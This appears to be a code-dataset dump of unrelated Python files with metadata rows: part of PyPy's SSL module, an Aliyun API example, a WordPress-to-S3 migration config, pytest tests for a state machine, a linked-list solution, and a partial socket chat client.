w_value = space.wrap(rffi.charpsize2str(buf_ptr[0], length))
w_value = space.call_method(w_value, "decode", space.wrap("utf-8"))
return space.newtuple([w_name, w_value])
SSLObject.typedef = TypeDef("SSLObject",
server = interp2app(SSLObject.server),
issuer = interp2app(SSLObject.issuer),
write = interp2app(SSLObject.write),
pending = interp2app(SSLObject.pending),
read = interp2app(SSLObject.read),
do_handshake = interp2app(SSLObject.do_handshake),
shutdown = interp2app(SSLObject.shutdown),
cipher = interp2app(SSLObject.cipher),
peer_certificate = interp2app(SSLObject.peer_certificate),
)
def new_sslobject(space, w_sock, side, w_key_file, w_cert_file,
cert_mode, protocol, w_cacerts_file, w_ciphers):
ss = SSLObject(space)
sock_fd = space.int_w(space.call_method(w_sock, "fileno"))
w_timeout = space.call_method(w_sock, "gettimeout")
if space.is_w(w_timeout, space.w_None):
has_timeout = False
else:
has_timeout = True
if space.is_w(w_key_file, space.w_None):
key_file = None
else:
key_file = space.str_w(w_key_file)
if space.is_w(w_cert_file, space.w_None):
cert_file = None
else:
cert_file = space.str_w(w_cert_file)
if space.is_w(w_cacerts_file, space.w_None):
cacerts_file = None
else:
cacerts_file = space.str_w(w_cacerts_file)
if space.is_w(w_ciphers, space.w_None):
ciphers = None
else:
ciphers = space.str_w(w_ciphers)
if side == PY_SSL_SERVER and (not key_file or not cert_file):
raise ssl_error(space, "Both the key & certificate files "
"must be specified for server-side operation")
# set up context
if protocol == PY_SSL_VERSION_TLS1:
method = libssl_TLSv1_method()
elif protocol == PY_SSL_VERSION_SSL3:
method = libssl_SSLv3_method()
elif protocol == PY_SSL_VERSION_SSL2 and not OPENSSL_NO_SSL2:
method = libssl_SSLv2_method()
elif protocol == PY_SSL_VERSION_SSL23:
method = libssl_SSLv23_method()
else:
raise ssl_error(space, "Invalid SSL protocol variant specified")
ss.ctx = libssl_SSL_CTX_new(method)
if not ss.ctx:
raise ssl_error(space, "Could not create SSL context")
if ciphers:
ret = libssl_SSL_CTX_set_cipher_list(ss.ctx, ciphers)
if ret == 0:
raise ssl_error(space, "No cipher can be selected.")
if cert_mode != PY_SSL_CERT_NONE:
if not cacerts_file:
raise ssl_error(space,
"No root certificates specified for "
"verification of other-side certificates.")
ret = libssl_SSL_CTX_load_verify_locations(ss.ctx, cacerts_file, None)
if ret != 1:
raise _ssl_seterror(space, None, 0)
if key_file:
ret = libssl_SSL_CTX_use_PrivateKey_file(ss.ctx, key_file,
SSL_FILETYPE_PEM)
if ret < 1:
raise ssl_error(space, "SSL_CTX_use_PrivateKey_file error")
ret = libssl_SSL_CTX_use_certificate_chain_file(ss.ctx, cert_file)
if ret < 1:
raise ssl_error(space, "SSL_CTX_use_certificate_chain_file error")
# ssl compatibility
libssl_SSL_CTX_set_options(ss.ctx,
SSL_OP_ALL & ~SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS)
verification_mode = SSL_VERIFY_NONE
if cert_mode == PY_SSL_CERT_OPTIONAL:
verification_mode = SSL_VERIFY_PEER
elif cert_mode == PY_SSL_CERT_REQUIRED:
verification_mode = SSL_VERIFY_PEER | SSL_VERIFY_FAIL_IF_NO_PEER_CERT
libssl_SSL_CTX_set_verify(ss.ctx, verification_mode, None)
ss.ssl = libssl_SSL_new(ss.ctx) # new ssl struct
libssl_SSL_set_fd(ss.ssl, sock_fd) # set the socket for SSL
libssl_SSL_set_mode(ss.ssl, SSL_MODE_AUTO_RETRY)
# If the socket is in non-blocking mode or timeout mode, set the BIO
# to non-blocking mode (blocking is the default)
if has_timeout:
# Set both the read and write BIO's to non-blocking mode
libssl_BIO_set_nbio(libssl_SSL_get_rbio(ss.ssl), 1)
libssl_BIO_set_nbio(libssl_SSL_get_wbio(ss.ssl), 1)
libssl_SSL_set_connect_state(ss.ssl)
if side == PY_SSL_CLIENT:
libssl_SSL_set_connect_state(ss.ssl)
else:
libssl_SSL_set_accept_state(ss.ssl)
ss.w_socket = w_sock
return ss
def check_socket_and_wait_for_timeout(space, w_sock, writing):
"""If the socket has a timeout, do a select()/poll() on the socket.
The argument writing indicates the direction.
Returns one of the possibilities in the timeout_state enum (above)."""
w_timeout = space.call_method(w_sock, "gettimeout")
if space.is_w(w_timeout, space.w_None):
return SOCKET_IS_BLOCKING
elif space.float_w(w_timeout) == 0.0:
return SOCKET_IS_NONBLOCKING
sock_timeout = space.float_w(w_timeout)
sock_fd = space.int_w(space.call_method(w_sock, "fileno"))
# guard against closed socket
if sock_fd < 0:
return SOCKET_HAS_BEEN_CLOSED
# see if the socket is ready
# Prefer poll, if available, since you can poll() any fd
# which can't be done with select().
if HAVE_RPOLL:
if writing:
fddict = {sock_fd: rpoll.POLLOUT}
else:
fddict = {sock_fd: rpoll.POLLIN}
# socket's timeout is in seconds, poll's timeout in ms
timeout = int(sock_timeout * 1000 + 0.5)
ready = rpoll.poll(fddict, timeout)
else:
if MAX_FD_SIZE is not None and sock_fd >= MAX_FD_SIZE:
return SOCKET_TOO_LARGE_FOR_SELECT
if writing:
r, w, e = rpoll.select([], [sock_fd], [], sock_timeout)
ready = w
else:
r, w, e = rpoll.select([sock_fd], [], [], sock_timeout)
ready = r
if ready:
return SOCKET_OPERATION_OK
else:
return SOCKET_HAS_TIMED_OUT
def _ssl_seterror(space, ss, ret):
assert ret <= 0
if ss and ss.ssl:
err = libssl_SSL_get_error(ss.ssl, ret)
else:
err = SSL_ERROR_SSL
errstr = ""
errval = 0
if err == SSL_ERROR_ZERO_RETURN:
errstr = "TLS/SSL connection has been closed"
errval = PY_SSL_ERROR_ZERO_RETURN
elif err == SSL_ERROR_WANT_READ:
errstr = "The operation did not complete (read)"
errval = PY_SSL_ERROR_WANT_READ
elif err == SSL_ERROR_WANT_WRITE:
errstr = "The operation did not complete (write)"
errval = PY_SSL_ERROR_WANT_WRITE
elif err == SSL_ERROR_WANT_X509_LOOKUP:
errstr = "The operation did not complete (X509 lookup)"
errval = PY_SSL_ERROR_WANT_X509_LOOKUP
elif err == SSL_ERROR_WANT_CONNECT:
errstr = "The operation did not complete (connect)"
errval = PY_SSL_ERROR_WANT_CONNECT
elif err == SSL_ERROR_SYSCALL:
e = libssl_ERR_get_error()
if e == 0:
if ret == 0 or space.is_w(ss.w_socket, space.w_None):
errstr = "EOF occurred in violation of protocol"
errval = PY_SSL_ERROR_EOF
elif ret == -1:
# the underlying BIO reported an I/0 error
error = rsocket.last_error()
return interp_socket.converted_error(space, error)
else:
errstr = "Some I/O error occurred"
errval = PY_SSL_ERROR_SYSCALL
else:
errstr = rffi.charp2str(libssl_ERR_error_string(e, None))
errval = PY_SSL_ERROR_SYSCALL
elif err == SSL_ERROR_SSL:
e = libssl_ERR_get_error()
errval = PY_SSL_ERROR_SSL
if e != 0:
errstr = rffi.charp2str(libssl_ERR_error_string(e, None))
else:
errstr = "A failure in the SSL library occurred"
else:
errstr = "Invalid error code"
errval = PY_SSL_ERROR_INVALID_ERROR_CODE
return ssl_error(space, errstr, errval)
@unwrap_spec(side=int, cert_mode=int, protocol=int)
def sslwrap(space, w_socket, side, w_key_file=None, w_cert_file=None,
cert_mode=PY_SSL_CERT_NONE, protocol=PY_SSL_VERSION_SSL23,
w_cacerts_file=None, w_ciphers=None):
"""sslwrap(socket, side, [keyfile, certfile]) -> sslobject"""
return space.wrap(new_sslobject(
space, w_socket, side, w_key_file, w_cert_file,
cert_mode, protocol,
w_cacerts_file, w_ciphers))
class Cache:
def __init__(self, space):
w_socketerror = interp_socket.get_error(space, "error")
self.w_error = space.new_exception_class(
"_ssl.SSLError", w_socketerror)
def get_error(space):
return space.fromcache(Cache).w_error
@unwrap_spec(filename=str, verbose=bool)
def _test_decode_cert(space, filename, verbose=True):
cert = libssl_BIO_new(libssl_BIO_s_file())
if not cert:
raise ssl_error(space, "Can't malloc memory to read file")
try:
if libssl_BIO_read_filename(cert, filename) <= 0:
raise ssl_error(space, "Can't open file")
x = libssl_PEM_read_bio_X509_AUX(cert, None, None, None)
if not x:
raise ssl_error(space, "Error decoding PEM-encoded file")
try:
return _decode_certificate(space, x, verbose)
finally:
libssl_X509_free(x)
finally:
libssl_BIO_free(cert)
# this function is needed to perform locking on shared data
# structures. (Note that OpenSSL uses a number of global data
# structures that will be implicitly shared whenever multiple threads
# use OpenSSL.) Multi-threaded applications will crash at random if
# it is not set.
#
# locking_function() must be able to handle up to CRYPTO_num_locks()
# different mutex locks. It sets the n-th lock if mode & CRYPTO_LOCK, and
# releases it otherwise.
#
# filename and line are the file number of the function setting the
# lock. They can be useful for debugging.
_ssl_locks = []
def _ssl_thread_locking_function(mode, n, filename, line):
n = intmask(n)
if n < 0 or n >= len(_ssl_locks):
return
if intmask(mode) & CRYPTO_LOCK:
_ssl_locks[n].acquire(True)
else:
_ssl_locks[n].release()
def _ssl_thread_id_function():
from pypy.module.thread import ll_thread
return rffi.cast(rffi.LONG, ll_thread.get_ident())
def setup_ssl_threads():
from pypy.module.thread import ll_thread
for i in range(libssl_CRYPTO_num_locks()):
_ssl_locks.append(ll_thread.allocate_lock())
libssl_CRYPTO_set_locking_callback(_ssl_thread_locking_function)
libssl_CRYPTO_set_id_callback(_ssl_thread_id_function)
| 38.132898 | 91 | 0.631777 | 4,649 | 35,006 | 4.454721 | 0.126049 | 0.036311 | 0.02028 | 0.013761 | 0.392033 | 0.327813 | 0.267986 | 0.234573 | 0.207967 | 0.187639 | 0 | 0.014511 | 0.289322 | 35,006 | 917 | 92 | 38.174482 | 0.817952 | 0.12275 | 0 | 0.314074 | 0 | 0 | 0.062288 | 0.005917 | 0 | 0 | 0 | 0 | 0.002963 | 1 | 0.045926 | false | 0 | 0.017778 | 0.004444 | 0.122963 | 0.004444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ea007a2b53efa3763616ae1425044471321276f | 983 | py | Python | python/aliApi/containerRegistry/main.py | GordonChen13/learn-examples | d04ba39edc7fcc5a5f546ba72764df6ce2f9ee2b | [
"MIT"
] | 2 | 2018-05-14T02:16:36.000Z | 2019-07-15T03:16:02.000Z | python/aliApi/containerRegistry/main.py | GordonChen13/learn-examples | d04ba39edc7fcc5a5f546ba72764df6ce2f9ee2b | [
"MIT"
] | 1 | 2018-04-08T09:32:53.000Z | 2018-04-10T08:14:31.000Z | python/aliApi/containerRegistry/main.py | GordonChen13/learn-examples | d04ba39edc7fcc5a5f546ba72764df6ce2f9ee2b | [
"MIT"
] | 2 | 2017-11-27T05:34:34.000Z | 2018-09-25T05:06:53.000Z | #!/usr/bin/env python
# coding=utf-8
from aliyunsdkcore.acs_exception.exceptions import ClientException
from aliyunsdkcore.acs_exception.exceptions import ServerException
from aliyunsdkcore.client import AcsClient
# from aliyunsdkcr.request.v20160607 import GetImageLayerRequest
from aliyunsdkcr.request.v20160607 import GetRepoTagsRequest
# 示例执行异常时建议升级aliyun-python-sdk-core到最新版本
# 设置Client
apiClient = AcsClient('your access key id', 'your access key secret', 'cn-shenzhen')
# 构造请求
# request = GetImageLayerRequest.GetImageLayerRequest()
request = GetRepoTagsRequest.GetRepoTagsRequest()
# 设置参数
request.set_RepoNamespace("namespace")
request.set_RepoName("repo name")
# request.set_Tag("tag")
# 根据文档获取资源所在区域对应的RegionId
# 请求地址格式为cr.{regionId}.aliyuncs.com
request.set_endpoint("cr.cn-shenzhen.aliyuncs.com")
# 发起请求
try:
response = apiClient.do_action_with_exception(request)
print(response)
except ServerException as e:
print(e)
except ClientException as e:
print(e) | 35.107143 | 84 | 0.811801 | 112 | 983 | 7.044643 | 0.535714 | 0.050697 | 0.050697 | 0.073511 | 0.207858 | 0.114068 | 0 | 0 | 0 | 0 | 0 | 0.019101 | 0.094608 | 983 | 28 | 85 | 35.107143 | 0.867416 | 0.299084 | 0 | 0.125 | 0 | 0 | 0.141593 | 0.039823 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.1875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ea16b9669c920b19a570aba76fefeba84415d6c | 1,564 | py | Python | run.py | jasonmar/wp2s3.py | 7ff00eb12409923978a4e07230b7259ecfe25ddc | [
"Apache-2.0"
] | 1 | 2018-11-09T19:50:13.000Z | 2018-11-09T19:50:13.000Z | run.py | jasonmar/wp2s3.py | 7ff00eb12409923978a4e07230b7259ecfe25ddc | [
"Apache-2.0"
] | null | null | null | run.py | jasonmar/wp2s3.py | 7ff00eb12409923978a4e07230b7259ecfe25ddc | [
"Apache-2.0"
] | null | null | null | #
# Copyright (C) 2015 Jason Mar
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import wp2s3
kwargs = wp2s3.default_kwargs
# Edit the lines below with the specifics of your Wordpress account
myargs = {
"wp_uri" : 'https://blogname.wordpress.com/xmlrpc.php',
"wp_user" : 'user@wordpress.com',
"wp_pass" : 'password',
"wp_db" : 'wp.sqlite3',
"wp_host" : 'blogname.files.wordpress.com',
"s3_host" : 's3-us-west-2.amazonaws.com',
"s3_bucket" : 'blogname',
"wp_upload_dir" : r'C:\tmp\wp-upload',
"state" : { # Edit state if you need to skip certain steps
"metadata_loaded" : False, # False => fetch all media items and save to sqlite database
"media_downloaded" : False, # False => download all media items using links in database
"media_uploaded" : False, # False => upload all files from wp_upload_dir to s3 bucket
"posts_edited" : False # False => fetch all posts, replace wp_host with s3_host/s3_bucket, and apply changes
}
}
kwargs.update(myargs)
wp2s3.perform_migration(kwargs)
# EOF | 36.372093 | 116 | 0.704604 | 229 | 1,564 | 4.724891 | 0.567686 | 0.055453 | 0.02403 | 0.029575 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017419 | 0.192455 | 1,564 | 43 | 117 | 36.372093 | 0.839272 | 0.590793 | 0 | 0 | 0 | 0 | 0.450567 | 0.08752 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.05 | 0.05 | 0 | 0.05 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ea31af3452ac5977baccd33685b8b5716d9de5e | 11,654 | py | Python | tests/test_state.py | simonsobs/nextline | 94741b85002008cd84b7094a622ff03d18ecef5c | [
"MIT"
] | null | null | null | tests/test_state.py | simonsobs/nextline | 94741b85002008cd84b7094a622ff03d18ecef5c | [
"MIT"
] | 10 | 2021-05-05T14:51:04.000Z | 2022-03-03T19:42:37.000Z | tests/test_state.py | simonsobs/nextline | 94741b85002008cd84b7094a622ff03d18ecef5c | [
"MIT"
] | null | null | null | import time
from abc import ABC, abstractmethod
import pytest
from unittest.mock import Mock
from nextline.registry import PdbCIRegistry
from nextline.utils import Registry
from nextline.state import (
Initialized,
Running,
Exited,
Finished,
Closed,
StateObsoleteError,
StateMethodError
)
##__________________________________________________________________||
SOURCE_ONE = """
import time
time.sleep(0.1)
""".strip()
SOURCE_TWO = """
x = 2
""".strip()
SOURCE_RAISE = """
raise Exception('foo', 'bar')
""".strip()
##__________________________________________________________________||
@pytest.fixture(autouse=True)
def monkey_patch_trace(monkeypatch):
mock_instance = Mock()
mock_instance.return_value = None
mock_instance.pdb_ci_registry = Mock(spec=PdbCIRegistry)
mock_class = Mock(return_value=mock_instance)
monkeypatch.setattr('nextline.state.Trace', mock_class)
yield mock_class
@pytest.fixture(autouse=True)
async def wrap_registry(monkeypatch):
mock_class = Mock(side_effect=lambda : Mock(wraps=Registry()))
monkeypatch.setattr('nextline.state.Registry', mock_class)
yield
##__________________________________________________________________||
class BaseTestState(ABC):
@pytest.fixture()
def statement(self):
yield SOURCE_ONE
@pytest.fixture()
async def initialized(self, statement):
y = Initialized(statement)
yield y
if y.is_obsolete():
return
await y.close()
@pytest.fixture()
async def running(self, initialized):
y = initialized.run()
yield y
if y.is_obsolete():
return
exited = await y.exited()
if exited.is_obsolete():
return
finished = await exited.finish()
await finished.close()
@pytest.fixture()
async def exited(self, running):
y = await running.exited()
yield y
if y.is_obsolete():
return
finished = await y.finish()
await finished.close()
@pytest.fixture()
async def finished(self, exited):
y = await exited.finish()
yield y
if y.is_obsolete():
return
await y.close()
@pytest.fixture()
async def closed(self, finished):
y = await finished.close()
yield y
@abstractmethod
def state(self, *_, **__):
pass
params = (pytest.param(SOURCE_TWO, id="SOURCE_TWO"), None)
@pytest.fixture(params=params)
def statements_for_test_reset(self, statement, request):
old_statement = statement
statement = request.param
if statement:
expected_statement = statement
else:
expected_statement = old_statement
yield (expected_statement, statement)
def test_state(self, state):
assert isinstance(state, self.state_class)
assert 'obsolete' not in repr(state)
async def assert_obsolete(self, state):
assert 'obsolete' in repr(state)
with pytest.raises(StateObsoleteError):
state.run()
with pytest.raises(StateObsoleteError):
await state.exited()
with pytest.raises(StateObsoleteError):
await state.finish()
with pytest.raises(StateObsoleteError):
state.reset()
with pytest.raises(StateObsoleteError):
await state.close()
def test_run(self, state):
with pytest.raises(StateMethodError):
state.run()
@pytest.mark.asyncio
async def test_exited(self, state):
with pytest.raises(StateMethodError):
await state.exited()
@pytest.mark.asyncio
async def test_finish(self, state):
with pytest.raises(StateMethodError):
await state.finish()
@pytest.mark.asyncio
async def test_reset(self, state, statements_for_test_reset):
_t, statement = statements_for_test_reset
with pytest.raises(StateMethodError):
state.reset(statement=statement)
def test_send_pdb_command(self, state):
thread_asynctask_id = (1, None)
command = 'next'
with pytest.raises(StateMethodError):
state.send_pdb_command(thread_asynctask_id, command)
def test_exception(self, state):
with pytest.raises(StateMethodError):
state.exception()
def test_result(self, state):
with pytest.raises(StateMethodError):
state.result()
class TestInitialized(BaseTestState):
state_class = Initialized
@pytest.fixture()
def state(self, initialized):
yield initialized
@pytest.mark.asyncio
async def test_run(self, state):
running = state.run()
assert isinstance(running, Running)
await self.assert_obsolete(state)
@pytest.mark.asyncio
async def test_reset(self, state, statements_for_test_reset):
expected_statement, statement = statements_for_test_reset
reset = state.reset(statement=statement)
assert isinstance(reset, Initialized)
assert expected_statement == reset.registry.get('statement')
assert reset is not state
assert reset.registry is state.registry
await self.assert_obsolete(state)
@pytest.mark.asyncio
async def test_close(self, state):
closed = await state.close()
assert isinstance(closed, Closed)
await self.assert_obsolete(state)
class TestRunning(BaseTestState):
state_class = Running
@pytest.fixture()
def state(self, running):
yield running
async def assert_obsolete(self, state):
assert 'obsolete' in repr(state)
with pytest.raises(StateObsoleteError):
state.run()
with pytest.raises(StateObsoleteError):
await state.finish()
with pytest.raises(StateObsoleteError):
state.reset()
with pytest.raises(StateObsoleteError):
await state.close()
@pytest.mark.asyncio
async def test_exited(self, state):
# exited() can be called multiple times
exited = await state.exited()
assert isinstance(exited, Exited)
assert exited is await state.exited()
assert exited is await state.exited()
await self.assert_obsolete(state)
def test_send_pdb_command(self, state):
pass
class TestExited(BaseTestState):
state_class = Exited
@pytest.fixture()
def state(self, exited):
yield exited
@pytest.mark.asyncio
async def test_finish(self, state):
finished = await state.finish()
assert isinstance(finished, Finished)
await self.assert_obsolete(state)
class TestFinished(BaseTestState):
state_class = Finished
@pytest.fixture()
def state(self, finished):
yield finished
@pytest.mark.asyncio
async def test_finish(self, state):
# The same object should be returned no matter
# how many times called.
assert state is await state.finish()
assert state is await state.finish()
assert state is await state.finish()
assert 'obsolete' not in repr(state)
@pytest.mark.asyncio
async def test_reset(self, state, statements_for_test_reset):
expected_statement, statement = statements_for_test_reset
reset = state.reset(statement=statement)
assert isinstance(reset, Initialized)
assert expected_statement == reset.registry.get('statement')
assert reset.registry is state.registry
await self.assert_obsolete(state)
@pytest.mark.asyncio
async def test_close(self, state):
closed = await state.close()
assert isinstance(closed, Closed)
await self.assert_obsolete(state)
@pytest.mark.asyncio
async def test_exception(self, state):
assert state.exception() is None
@pytest.mark.asyncio
async def test_result(self, state):
assert state.result() is None
@pytest.mark.asyncio
async def test_exception_raise(self):
state = Initialized(SOURCE_RAISE)
state = state.run()
state = await state.exited()
state = await state.finish()
assert isinstance(state, Finished)
assert isinstance(state.exception(), Exception)
assert ('foo', 'bar') == state.exception().args
with pytest.raises(Exception):
raise state.exception()
@pytest.mark.asyncio
async def test_result_raise(self):
state = Initialized(SOURCE_RAISE)
state = state.run()
state = await state.exited()
state = await state.finish()
assert isinstance(state, Finished)
with pytest.raises(Exception):
state.result()
class TestClosed(BaseTestState):
state_class = Closed
@pytest.fixture()
def state(self, closed):
yield closed
@pytest.mark.asyncio
async def test_reset(self, state, statements_for_test_reset):
expected_statement, statement = statements_for_test_reset
reset = state.reset(statement=statement)
assert isinstance(reset, Initialized)
assert expected_statement == reset.registry.get('statement')
assert reset.registry is not state.registry
await self.assert_obsolete(state)
@pytest.mark.asyncio
async def test_close(self, state):
# The same object should be returned no matter
# how many times called.
assert state is await state.close()
assert state is await state.close()
assert state is await state.close()
assert 'obsolete' not in repr(state)
##__________________________________________________________________||
@pytest.mark.asyncio
async def test_transition():
state = Initialized(SOURCE_ONE)
assert isinstance(state, Initialized)
state = state.run()
assert isinstance(state, Running)
state = await state.exited()
assert isinstance(state, Exited)
state = await state.finish()
assert isinstance(state, Finished)
state = await state.close()
assert isinstance(state, Closed)
@pytest.mark.asyncio
async def test_register_state_name():
state = Initialized(SOURCE_ONE)
state = state.run()
state = await state.exited()
state = await state.finish()
state = await state.close()
expected = ['initialized', 'running', 'exited', 'finished', 'closed']
actual = [c.args[1] for c in state.registry.register.call_args_list if c.args[0] == 'state_name']
assert expected == actual
@pytest.mark.asyncio
async def test_register_state_name_reset():
state = Initialized(SOURCE_ONE)
state = state.reset()
state = state.run()
state = await state.exited()
state = await state.finish()
state = state.reset()
state = state.run()
state = await state.exited()
state = await state.finish()
state = await state.close()
expected = [
'initialized',
'initialized', 'running', 'exited', 'finished',
'initialized', 'running', 'exited', 'finished', 'closed'
]
actual = [c.args[1] for c in state.registry.register.call_args_list if c.args[0] == 'state_name']
assert expected == actual
state = state.reset()
state = state.run()
state = await state.exited()
state = await state.finish()
state = await state.close()
expected = [
'initialized', 'running', 'exited', 'finished', 'closed'
]
actual = [c.args[1] for c in state.registry.register.call_args_list if c.args[0] == 'state_name']
assert expected == actual
##__________________________________________________________________||
| 27.813842 | 101 | 0.659259 | 1,286 | 11,654 | 5.606532 | 0.096423 | 0.051318 | 0.047157 | 0.061026 | 0.687517 | 0.613454 | 0.593343 | 0.539945 | 0.506103 | 0.476283 | 0 | 0.001136 | 0.244551 | 11,654 | 418 | 102 | 27.880383 | 0.81781 | 0.044105 | 0 | 0.612179 | 0 | 0 | 0.034517 | 0.002067 | 0 | 0 | 0 | 0 | 0.169872 | 1 | 0.048077 | false | 0.00641 | 0.025641 | 0 | 0.128205 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ea4ab72c6095ad5621af4df3773f6f0b18d8cda | 783 | py | Python | 160-intersection-of-two-linked-lists/160-intersection-of-two-linked-lists.py | tlylt/LeetCodeAnki | 9f69504c3762f7895d95c2a592f18ad395199ff4 | [
"MIT"
] | 1 | 2022-02-14T08:03:32.000Z | 2022-02-14T08:03:32.000Z | 160-intersection-of-two-linked-lists/160-intersection-of-two-linked-lists.py | tlylt/LeetCodeAnki | 9f69504c3762f7895d95c2a592f18ad395199ff4 | [
"MIT"
] | null | null | null | 160-intersection-of-two-linked-lists/160-intersection-of-two-linked-lists.py | tlylt/LeetCodeAnki | 9f69504c3762f7895d95c2a592f18ad395199ff4 | [
"MIT"
] | null | null | null | # Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:
l_a = self.findLength(headA)
l_b = self.findLength(headB)
while l_a > l_b:
headA = headA.next
l_a -= 1
while l_b > l_a:
headB = headB.next
l_b -= 1
while headA:
if headA == headB:
return headA
else:
headA = headA.next
headB = headB.next
return None
def findLength(self, node):
ans = 0
while node:
ans+=1
node = node.next
return ans | 27 | 80 | 0.494253 | 90 | 783 | 4.166667 | 0.333333 | 0.021333 | 0.074667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00885 | 0.422733 | 783 | 29 | 81 | 27 | 0.820796 | 0.157088 | 0 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0 | 0 | 0.26087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ea50b0a6baa34ab53b43f4b399dabbba9754ddb | 12,968 | py | Python | User/user.py | 17kisern/-GVSU-CIS457-Project2 | a2438e2c165a4e5b1381c332f2879122e081ff2d | [
"MIT"
] | null | null | null | User/user.py | 17kisern/-GVSU-CIS457-Project2 | a2438e2c165a4e5b1381c332f2879122e081ff2d | [
"MIT"
] | null | null | null | User/user.py | 17kisern/-GVSU-CIS457-Project2 | a2438e2c165a4e5b1381c332f2879122e081ff2d | [
"MIT"
] | null | null | null | import os
from os import path
import socket # Import socket module
import asyncio
import sys
"""
Notes
==============
socket.gethostname() gets the current machines hostname, for example "DESKTOP-1337PBJ"
string.encode('UTF-8') encodes the given string into a 'bytes' literal object using the UTF-8 standard that is required
bytes.decode("UTF-8") decodes some 'bytes' literal object using the UTF-8 standard that information gets sent over the internet in
all the b'string here' are converting a string into binary format. Hence the B
"""
connected = False
socketObject = socket.socket() # Create a socket object
responseBuffer = []
bufferSize = 1024
# host = socket.gethostname()
# host = "localhost" # Get local machine name
# port = 60000 # Reserve a port for your service.
def SendPayload(socketBoi, toSend: str):
payload = "".join([toSend, "\0"])
socketBoi.send(payload.encode("UTF-8"))
def RecvPayload(socketBoi):
# If we have shit in our respnse buffer, just use that
if(len(responseBuffer) > 0):
return responseBuffer.pop(0)
global bufferSize
returnString = ""
reachedEOF = False
while not reachedEOF:
# Receiving data in 1 KB chunks
data = socketBoi.recv(bufferSize)
if(not data):
reachedEOF = True
break
# If there was no data in the latest chunk, then break out of our loop
decodedString = data.decode("UTF-8")
if(len(decodedString) >= 2 and decodedString[len(decodedString) - 1: len(decodedString)] == "\0"):
reachedEOF = True
decodedString = decodedString[0:len(decodedString) - 1]
returnString += decodedString
# In case we received multiple responses, split everything on our EOT notifier (NULL \0), and cache into our response buffer
response = returnString.split("\0")
for entry in response:
responseBuffer.append(entry)
# Return the 0th index in the response buffer, and remove it from the response buffer
return responseBuffer.pop(0)
# Connect to a central server
def Connect(address, port: int, usernameOverride=""):
global connected
global socketObject
global bufferSize
try:
socketObject.connect((address, int(port)))
# data = socketObject.recv(bufferSize)
# connectionStatus = data.decode("UTF-8")
connectionStatus = RecvPayload(socketObject)
# Make sure we were accepted (server hasn't hit limit)
if(int(connectionStatus) != 200):
print("Connection Refused")
raise ConnectionRefusedError
else:
print("Connection Accepted")
print("\nSuccessfully connected to [", address, ":", int(port), "]")
usernameAccepted = False
while(not usernameAccepted):
if(usernameOverride == ""):
username = input("Username: ")
else:
username = usernameOverride
SendPayload(socketObject, username)
response = RecvPayload(socketObject)
if(response == "200"):
usernameAccepted = True
break
else:
print("Username not accepted. Please try another")
hostNameAccepted = False
while(not hostNameAccepted):
hostname = socket.gethostname()
SendPayload(socketObject, hostname)
response = RecvPayload(socketObject)
if(response == "200"):
hostNameAccepted = True
break
connectionSpeedAccepted = False
while(not connectionSpeedAccepted):
connectionSpeed = input("Connection Speed: ")
SendPayload(socketObject, connectionSpeed)
response = RecvPayload(socketObject)
if(response == "200"):
hostNameAccepted = True
break
connected = True
except ConnectionRefusedError:
print("\Server has reached it's user capacity. Please try again later.")
socketObject = socket.socket()
connected = False
except:
print("\nFailed to connect to [", address, ":", int(port), "]\nPlease Try Again")
socketObject = socket.socket()
connected = False
def ConnectGUI(address, port: int, usernameOverride=""):
global connected
if connected:
Disconnect(["connect", address, port])
Connect(address, port, usernameOverride)
if(connected):
RefreshServer()
print("\nReady to interact with Server")
else:
Connect(address, port, usernameOverride)
if(connected):
RefreshServer()
print("\nReady to interact with Server")
# Disconnect from the central server
def Disconnect(commandArgs):
global connected
global socketObject
try:
SendPayload(socketObject, " ".join(commandArgs))
socketObject.close()
socketObject = socket.socket()
print("Successfully disconnected")
connected = False
except:
print("Failed to disconnect! Please try again")
return
# Ask server for available files
def List(commandArgs):
global socketObject
global bufferSize
